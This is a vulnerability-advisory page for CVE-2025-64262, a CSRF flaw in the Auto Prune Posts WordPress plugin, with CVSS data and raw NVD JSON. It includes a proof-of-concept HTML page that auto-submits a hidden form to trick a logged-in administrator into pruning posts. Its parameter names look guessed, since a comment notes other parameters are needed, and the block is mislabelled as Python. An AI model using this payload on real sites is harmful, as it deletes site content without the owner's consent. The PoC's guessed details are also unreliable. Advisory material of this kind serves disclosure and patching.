Security Vulnerability Report
中文
CVE-2025-64262 CVSS 6.5 MEDIUM

CVE-2025-64262

Published: 2025-11-13 10:15:51
Last Modified: 2026-04-27 16:16:39

Description

Cross-Site Request Forgery (CSRF) vulnerability in ramon fincken Auto Prune Posts auto-prune-posts allows Cross Site Request Forgery.This issue affects Auto Prune Posts: from n/a through <= 3.0.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Auto Prune Posts <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64262: Auto Prune Posts CSRF --> <html> <body> <h1>CVE-2025-64262 CSRF PoC</h1> <p>诱骗已登录的管理员访问此页面将触发自动修剪文章操作</p> <form action="http://target-wordpress-site/wp-admin/admin.php" method="POST" id="csrf-form"> <input type="hidden" name="page" value="auto-prune-posts" /> <input type="hidden" name="auto&#95;prune&#95;posts&#95;run" value="1" /> <input type="hidden" name="auto&#95;prune&#95;posts&#95;age" value="30" /> <input type="hidden" name="auto&#95;prune&#95;posts&#95;post&#95;type" value="post" /> <!-- 其他必要的表单参数 --> </form> <script> // 自动提交表单 document.getElementById('csrf-form').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64262", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:51.467", "lastModified": "2026-04-27T16:16:38.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in ramon fincken Auto Prune Posts auto-prune-posts allows Cross Site Request Forgery.This issue affects Auto Prune Posts: from n/a through <= 3.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/auto-prune-posts/vulnerability/wordpress-auto-prune-posts-plugin-3-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}